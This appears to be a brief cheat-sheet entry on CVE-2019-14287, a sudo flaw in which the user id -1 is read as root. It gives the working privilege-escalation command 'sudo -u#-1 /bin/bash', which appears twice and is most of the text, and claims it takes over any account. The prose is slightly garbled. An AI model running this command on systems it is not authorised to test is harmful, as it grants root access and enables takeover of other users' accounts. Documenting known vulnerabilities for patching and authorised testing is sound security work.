CVE-2019-14287 (sudo -u#-1 /bin/bash)
This can be used to take over any user account on the system, simple and straight forward.
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id
sudo -u#-1 /bin/bashLast updated